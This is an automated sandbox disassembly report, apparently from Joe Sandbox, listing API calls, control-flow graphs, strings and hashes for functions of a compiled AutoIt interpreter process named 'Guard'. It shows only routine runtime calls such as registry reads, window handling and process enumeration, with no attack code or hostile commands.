                                                                        • Part of subcall function 006D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,006C2A3E,?,00008000), ref: 006D0BA7
                                                                        • Part of subcall function 006D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006C2A58,?,00008000), ref: 006D02A4
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 006C2ADF
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 006C2C2C
                                                                        • Part of subcall function 006C3EBE: _wcscpy.LIBCMT ref: 006C3EF6
                                                                        • Part of subcall function 006D386D: _iswctype.LIBCMT ref: 006D3875
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-3738523708
                                                                      • Opcode ID: 4ad1d3c05fe4877c4d899f8356ad3e45f9bd33fb7dd9167ecaffc9afe3573af7
                                                                      • Instruction ID: e16de6d9aedd546f73c901680f16ffe220a295b4462a6280894652910a87a8fd
                                                                      • Opcode Fuzzy Hash: 4ad1d3c05fe4877c4d899f8356ad3e45f9bd33fb7dd9167ecaffc9afe3573af7
                                                                      • Instruction Fuzzy Hash: 30027A705083419FC764EF24C851EAFBBE6EF89314F00491EF599972A2DB34DA49CB46

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1181 6c2fc5-6c30ea call 6e1b70 call 6c1207 call 6d00cf call 6d08c1 call 6c1900 call 6c4c94 call 6c1207 call 6c19e1 RegOpenKeyExW 1198 7001a3-7001be RegQueryValueExW 1181->1198 1199 6c30f0-6c310d call 6c1cb6 * 2 1181->1199 1201 7001c0-7001ff call 6d0fe6 call 6c433f RegQueryValueExW 1198->1201 1202 700235-700241 RegCloseKey 1198->1202 1215 700201-70021b call 6c1821 1201->1215 1216 70021d-700223 1201->1216 1202->1199 1204 700247-70024b 1202->1204 1208 700250-700276 call 6c1609 * 2 1204->1208 1221 700278-700286 call 6c1609 1208->1221 1222 70029b-7002a8 call 6d2e2c 1208->1222 1215->1216 1219 700233 1216->1219 1220 700225-700232 call 6d105c * 2 1216->1220 1219->1202 1220->1219 1221->1222 1231 700288-700299 call 6d2fbd 1221->1231 1233 7002aa-7002bb call 6d2e2c 1222->1233 1234 7002ce-700308 call 6c1a36 call 6c4c94 call 6c1cb6 call 6c1609 1222->1234 1243 70030e-70030f 1231->1243 1233->1234 1241 7002bd-7002cd call 6d2fbd 1233->1241 1234->1199 1234->1243 1241->1234 1243->1208
                                                                      APIs
                                                                        • Part of subcall function 006D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,006C3094), ref: 006D00ED
                                                                        • Part of subcall function 006D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006C309F), ref: 006D08E3
                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006C30E2
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007001BA
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007001FB
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00700239
                                                                      • _wcscat.LIBCMT ref: 00700292
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177
                                                                      • Opcode ID: 6faa10976c32697e1f1221afa0af0285d9f5828bf24ddc22ac37c0cd63f10b0d
                                                                      • Instruction ID: 454fa1561ce36854b2cc4b4ff80c4afec2743de535148ecc147ef9193ea75eb3
                                                                      • Opcode Fuzzy Hash: 6faa10976c32697e1f1221afa0af0285d9f5828bf24ddc22ac37c0cd63f10b0d
                                                                      • Instruction Fuzzy Hash: 1A71B1714453019EC380EF25DC59A6BBBE9FF46391F40452EF449872B2EF349984CB9A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1312 6c4d83-6c4dd1 1314 6c4e31-6c4e33 1312->1314 1315 6c4dd3-6c4dd6 1312->1315 1314->1315 1316 6c4e35 1314->1316 1317 6c4dd8-6c4ddf 1315->1317 1318 6c4e37 1315->1318 1319 6c4e1a-6c4e22 DefWindowProcW 1316->1319 1322 6c4ead-6c4eb5 PostQuitMessage 1317->1322 1323 6c4de5-6c4dea 1317->1323 1320 6c4e3d-6c4e40 1318->1320 1321 7009c2-7009f0 call 6bc460 call 6bc483 1318->1321 1330 6c4e28-6c4e2e 1319->1330 1325 6c4e65-6c4e8c SetTimer RegisterWindowMessageW 1320->1325 1326 6c4e42-6c4e43 1320->1326 1359 7009f5-7009fc 1321->1359 1324 6c4e61-6c4e63 1322->1324 1327 700a35-700a49 call 712cce 1323->1327 1328 6c4df0-6c4df2 1323->1328 1324->1330 1325->1324 1333 6c4e8e-6c4e99 CreatePopupMenu 1325->1333 1331 700965-700968 1326->1331 1332 6c4e49-6c4e5c KillTimer call 6c5ac3 call 6b34e4 1326->1332 1327->1324 1353 700a4f 1327->1353 1334 6c4df8-6c4dfd 1328->1334 1335 6c4eb7-6c4ec1 call 6c5b29 1328->1335 1339 70096a-70096c 1331->1339 1340 70099e-7009bd MoveWindow 1331->1340 1332->1324 1333->1324 1342 700a1a-700a21 1334->1342 1343 6c4e03-6c4e08 1334->1343 1346 6c4ec6 1335->1346 1347 70098d-700999 SetFocus 1339->1347 1348 70096e-700971 1339->1348 1340->1324 1342->1319 1350 700a27-700a30 call 708854 1342->1350 1351 6c4e0e-6c4e14 1343->1351 1352 6c4e9b-6c4eab call 6c5bd7 1343->1352 1346->1324 1347->1324 1348->1351 1355 700977-700988 call 6bc460 1348->1355 1350->1319 1351->1319 1351->1359 1352->1324 1353->1319 1355->1324 1359->1319 1360 700a02-700a15 call 6c5ac3 call 6c59d3 1359->1360 1360->1319
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 006C4E22
                                                                      • KillTimer.USER32(?,00000001), ref: 006C4E4C
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006C4E6F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006C4E7A
                                                                      • CreatePopupMenu.USER32 ref: 006C4E8E
                                                                      • PostQuitMessage.USER32(00000000), ref: 006C4EAF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: b16030dcbbc766634354a140868e0e76efefc5b10a543487c3abef764e2392c7
                                                                      • Instruction ID: ed322bf42b12aaec89772d30922f71e6e9233abcad45d929761ac134cc15c88c
                                                                      • Opcode Fuzzy Hash: b16030dcbbc766634354a140868e0e76efefc5b10a543487c3abef764e2392c7
                                                                      • Instruction Fuzzy Hash: 9C412771204609AADF199F24DC19FFA3697F748350F01422DFA06D12E2CF78AC91D7AA

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006D07EC
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 006D07F4
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006D07FF
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006D080A
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 006D0812
                                                                        • Part of subcall function 006D07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 006D081A
                                                                        • Part of subcall function 006CFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006BAC6B), ref: 006CFFA7
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006BAD08
                                                                      • OleInitialize.OLE32(00000000), ref: 006BAD85
                                                                      • CloseHandle.KERNEL32(00000000), ref: 006F2F56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: <ww$\tw$sw
                                                                      • API String ID: 1986988660-2988750673
                                                                      • Opcode ID: 45b2577c40e0bb6dacda3e9b863f9abe417daf7b06d92bcfd8d55104fa24e5c8
                                                                      • Instruction ID: af7e0f048c17909e4a7b26ae96b1ed1e5099fe4a64c10112b34919bdf309cad2
                                                                      • Opcode Fuzzy Hash: 45b2577c40e0bb6dacda3e9b863f9abe417daf7b06d92bcfd8d55104fa24e5c8
                                                                      • Instruction Fuzzy Hash: 498199B09093808EC79CDF69AD85A657EE5EB49384710C57E941CCB272EB7C4484CF99
                                                                      APIs
                                                                        • Part of subcall function 006D593C: __FF_MSGBANNER.LIBCMT ref: 006D5953
                                                                        • Part of subcall function 006D593C: __NMSG_WRITE.LIBCMT ref: 006D595A
                                                                        • Part of subcall function 006D593C: RtlAllocateHeap.NTDLL(00BD0000,00000000,00000001,?,00000004,?,?,006D1003,?), ref: 006D597F
                                                                      • std::exception::exception.LIBCMT ref: 006D101C
                                                                      • __CxxThrowException@8.LIBCMT ref: 006D1031
                                                                        • Part of subcall function 006D87CB: RaiseException.KERNEL32(?,?,?,0076CAF8,?,?,?,?,?,006D1036,?,0076CAF8,?,00000001), ref: 006D8820
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID: `=t$h=t
                                                                      • API String ID: 3902256705-4135100045
                                                                      • Opcode ID: 9365f1385d8f60bd1e696b0bad9fc51d6a87f3de2ed2b121861b778aeec0eaf3
                                                                      • Instruction ID: 4e9e9d50b9d2d231bf563ac25e2ea5409f1cec233d2b2741a1b129e9c353dd78
                                                                      • Opcode Fuzzy Hash: 9365f1385d8f60bd1e696b0bad9fc51d6a87f3de2ed2b121861b778aeec0eaf3
                                                                      • Instruction Fuzzy Hash: CAF0A935E0461DB6DB20BB58EC159EE7BAD9F01310F10046BFD1896391DFB18B41C695
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0071416D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0071417B
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0071419B
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00714245
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: 82fe145c44dd26cce7a86b10457d6ed932da57566abe1540ff870998912998bb
                                                                      • Instruction ID: 88cd85556de6cb810988ac042c39148c76e70c4c49186c0aad383a3543ee0624
                                                                      • Opcode Fuzzy Hash: 82fe145c44dd26cce7a86b10457d6ed932da57566abe1540ff870998912998bb
                                                                      • Instruction Fuzzy Hash: 9631AD711083419FD300EF54D885FBEBBE9FF96350F00092EF581861A2EB749A89CB92
                                                                      APIs
                                                                        • Part of subcall function 006C49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006C27AF,?,00000001), ref: 006C49F4
                                                                      • _free.LIBCMT ref: 006FFB04
                                                                      • _free.LIBCMT ref: 006FFB4B
                                                                        • Part of subcall function 006C29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 006C2ADF
                                                                      Strings
                                                                      • Bad directive syntax error, xrefs: 006FFB33
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: Bad directive syntax error
                                                                      • API String ID: 2861923089-2118420937
                                                                      • Opcode ID: dfb232ef442a2dd6b82df40999ccf6f5000c9c2fea26b5828fd6e4747a6345f5
                                                                      • Instruction ID: cc9cddb45c32f11acc77aa1285d3c1cdf966595126eba6620bec7217d961d577
                                                                      • Opcode Fuzzy Hash: dfb232ef442a2dd6b82df40999ccf6f5000c9c2fea26b5828fd6e4747a6345f5
                                                                      • Instruction Fuzzy Hash: 90916B71900219EFCF14EFA4C891AFDB7B6FF09310B14452EE916AB2A1DB74AA05CB54
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: AU3! ?t$EA06
                                                                      • API String ID: 4104443479-24477217
                                                                      • Opcode ID: 3b0ac25f4614daa5dbe909d6b4a6ad77fcc0d595007aee6836fa9608ec3f472e
                                                                      • Instruction ID: 8a1f3991dc62da28c3454dcc38e2d6baf7f1b3732c4c8beeed91f0da44e6f6c1
                                                                      • Opcode Fuzzy Hash: 3b0ac25f4614daa5dbe909d6b4a6ad77fcc0d595007aee6836fa9608ec3f472e
                                                                      • Instruction Fuzzy Hash: 7A413A61E041689BDF21DB548861FFF7BA7DB45310F58816DE882E72C6DE348D8583E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d078509314504ded99ca0017d5b086404c8bd748071e1eeb4e31d232654f20ac
                                                                      • Instruction ID: 25572ddf5fbb43a2f3828c95a27e0ac642459c0b37dfdeeae3357bb78468e2a1
                                                                      • Opcode Fuzzy Hash: d078509314504ded99ca0017d5b086404c8bd748071e1eeb4e31d232654f20ac
                                                                      • Instruction Fuzzy Hash: 3BF18C7190021A9BCF14DF95C8A0EFEB7B6FF45300F54802EED16AB291DB399A41CB65
                                                                      APIs
                                                                      • _strcat.LIBCMT ref: 0072E20C
                                                                        • Part of subcall function 006B4D37: __itow.LIBCMT ref: 006B4D62
                                                                        • Part of subcall function 006B4D37: __swprintf.LIBCMT ref: 006B4DAC
                                                                      • _wcscpy.LIBCMT ref: 0072E29B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1012013722-0
                                                                      • Opcode ID: 1d6c2dfad7cc32c7f8a6e5bea0a611eefc0171f6c36d132b4efc8fc1a1dcbb8f
                                                                      • Instruction ID: 97ee55ff99050acbfb3a3b07f0ca5b1d9e045c3a8793c927b46a2c25012031df
                                                                      • Opcode Fuzzy Hash: 1d6c2dfad7cc32c7f8a6e5bea0a611eefc0171f6c36d132b4efc8fc1a1dcbb8f
                                                                      • Instruction Fuzzy Hash: B4915875A00614DFCB68EF18D4919A9B7E6FF49310B55805EE80A8F3A2DB34ED41CB84
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,006C3E72,?,?,?,00000000), ref: 006C4327
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,006C3E72,?,?,?,00000000), ref: 00700717
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 400851e27ff476e04e24c304b159edee6544afff732e7889b36a51e7c894db09
                                                                      • Instruction ID: 18e173ac770463129c10d8a0cbb915cf1a44690139f232ad73b13492821a30bb
                                                                      • Opcode Fuzzy Hash: 400851e27ff476e04e24c304b159edee6544afff732e7889b36a51e7c894db09
                                                                      • Instruction Fuzzy Hash: 3F019270244349BEF3204E25CC9AFB67ADDEB01768F10C319FAE86A1E0CBB55C468B54
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                      • Instruction ID: 4ba9a320c222048291cb7037a7454c5d640439136849e2be5ac1810f6b453cef
                                                                      • Opcode Fuzzy Hash: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                      • Instruction Fuzzy Hash: E461BFB0600606DFDB10EF94C881AFAB7E6EF44300F15816DE9569B392EB74ED81DB51
                                                                      APIs
                                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 006C41B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 49be6cfc04066d9a1521f6c384f4fb691e46a1029a29eda20ee1b19ddc9cb165
                                                                      • Instruction ID: cc34ddecb6d676e66d62fe762f4891b4930bc9c971678391521c40d3bb890dc0
                                                                      • Opcode Fuzzy Hash: 49be6cfc04066d9a1521f6c384f4fb691e46a1029a29eda20ee1b19ddc9cb165
                                                                      • Instruction Fuzzy Hash: 75313D71A00615AFCB18DF68C894BBDB7B6FF54310F18862DE85593B10DB71A9A08B90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 0fbc3058b6a3238e3ee95f775ce7053765bc72faa9761628bf13fd9e72fe5901
                                                                      • Instruction ID: e7c7c5b8edc72d89e11dfc2113d2b745aa8732b4402ca016bad4888f15604a69
                                                                      • Opcode Fuzzy Hash: 0fbc3058b6a3238e3ee95f775ce7053765bc72faa9761628bf13fd9e72fe5901
                                                                      • Instruction Fuzzy Hash: 2E4109B4504341DFDB14DF18C444B5ABBE2BF45304F0988ACF9899B362C776E885CB56
                                                                      APIs
                                                                        • Part of subcall function 006C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 006C4B63
                                                                        • Part of subcall function 006D547B: __wfsopen.LIBCMT ref: 006D5486
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006C27AF,?,00000001), ref: 006C49F4
                                                                        • Part of subcall function 006C4ADE: FreeLibrary.KERNEL32(00000000), ref: 006C4B18
